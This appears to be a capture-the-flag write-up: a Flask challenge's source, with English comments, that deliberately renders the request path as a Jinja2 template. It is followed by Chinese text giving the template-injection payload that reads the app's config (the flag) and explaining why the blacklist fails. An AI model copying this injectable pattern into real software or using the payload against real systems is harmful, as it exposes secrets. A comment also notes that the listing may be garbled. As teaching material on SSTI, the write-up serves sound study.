import flask
import os
# Create the Flask application object for this module.
app = flask.Flask(__name__)
# Store the flag in app.config and remove it from the process environment in
# the same step: os.environ.pop() deletes the variable and raises KeyError when
# FLAG is unset. The value stays readable by anything that can reach the
# application object, which includes code evaluated inside templates.
app.config['FLAG'] = os.environ.pop('FLAG')
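@app.route('/')
def index():
    """Return this module's own source code as the response body.

    Serving the source looks intentional for this challenge; a real
    application should not expose its code this way.
    """
    # __file__ (double underscores) is the path of the running module; the
    # listing's `_file_` is an undefined name. The context manager closes the
    # handle once the text has been read.
    with open(__file__) as source_file:
        return source_file.read()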
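@app.route('/shrine/<path:shrine>')
def shrine(shrine):
    """Render the URL path after /shrine/ as a Jinja2 template.

    SECURITY: the request path is used as the template *source*, which is
    server-side template injection by construction. The blacklist below only
    rebinds the template variables ``config`` and ``self`` to None; it does
    not stop a template from reaching the same objects through other names
    in the template context. In real code, keep the template fixed and pass
    untrusted text in as a variable instead.

    Args:
        shrine: Path segment captured by the ``path`` converter (may
            contain slashes).

    Returns:
        The rendered template output.
    """
    def safe_jinja(s):
        """Prefix *s* with statements that set each blacklisted name to None."""
        # NOTE(review): the listing strips '.' and ' ' here, yet the payload
        # quoted below the listing contains dots. These characters may have
        # been garbled in transcription (possibly '(' and ')') - confirm
        # against the original challenge source.
        s = s.replace('.', '').replace(' ', '')
        blacklist = ['config', 'self']
        # Doubled braces are literal braces for str.format(), so each entry
        # becomes "{% set NAME=None%}". The listing's f-string form is not
        # valid Python.
        shadowing = ''.join('{{% set {}=None%}}'.format(c) for c in blacklist)
        return shadowing + s

    return flask.render_template_string(safe_jinja(shrine))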
if __name__ == '__main__':
    # Start Flask's development server only when the file is run as a script.
    # debug=True turns on the reloader and the interactive Werkzeug debugger,
    # which is suitable for a local challenge instance only and must never be
    # reachable from an untrusted network.
    app.run(debug=True)
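在 flask.render_template_string() 函数中,
传入 {{url_for.__globals__['current_app'].config}} 会优先被内置函数解析再使用shrine函数解析,
所以没有被过滤掉config,是一个解析时的函数优先级问题造成的SSTI漏洞。
更准确地说,safe_jinja 只是在模板开头用 {% set config=None%} 和 {% set self=None%} 把这两个模板变量名覆盖为 None;而通过 url_for 的 __globals__ 取得 current_app 之后访问的 .config 是对象属性,不是被覆盖的模板变量,因此黑名单对它不起作用。
根本问题在于把用户输入直接当作模板源码渲染,黑名单无法弥补这一点;正确的做法是使用固定模板,只把用户输入作为变量传入。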